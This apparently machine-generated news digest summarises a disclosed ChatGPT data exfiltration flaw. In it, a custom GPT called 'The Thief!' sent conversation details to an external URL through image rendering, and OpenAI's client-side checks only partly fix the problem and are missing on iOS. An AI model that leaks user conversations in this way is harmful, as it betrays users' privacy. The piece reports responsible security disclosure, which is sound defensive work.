December 21, 2023 at 11:49AM
OpenAI has addressed a data exfiltration bug in ChatGPT that could leak conversation details. The latest fix includes client-side checks, but it’s not perfect and attackers may still exploit it under certain conditions. Safety checks are not yet implemented in the iOS app, leaving the risk unaddressed. The issue was reported by security researcher Johann Rehberger.
Based on the meeting notes, here are the key takeaways:
1. OpenAI has mitigated a data exfiltration bug in ChatGPT that could leak conversation details to an external URL, but the mitigation is not perfect and attackers can still exploit it under certain conditions.
2. The safety checks to prevent data leaks are yet to be implemented in the iOS mobile app for ChatGPT, leaving the risk unaddressed on that platform.
3. A security researcher discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI. Despite efforts by the researcher, OpenAI’s response and mitigation efforts have been incomplete.
4. The researcher publicly disclosed the flaws and demonstrated how a custom GPT named “The Thief!” could exfiltrate conversation data to an external URL.
5. OpenAI responded with client-side checks via a validation API to prevent images from unsafe URLs from rendering, but the exact details of these checks are not fully known and there are still observed discrepancies in their effectiveness.
6. The client-side validation call has not yet been implemented in the iOS mobile app, and it is unclear whether the fix was rolled out to the ChatGPT Android app, leaving the specific platforms at risk.
These takeaways highlight the ongoing vulnerabilities of ChatGPT and the incomplete mitigation efforts by OpenAI, particularly regarding the safety checks for image URLs and the lack of implementation in the iOS mobile app. This information may be crucial for further action and decision-making regarding the security of ChatGPT.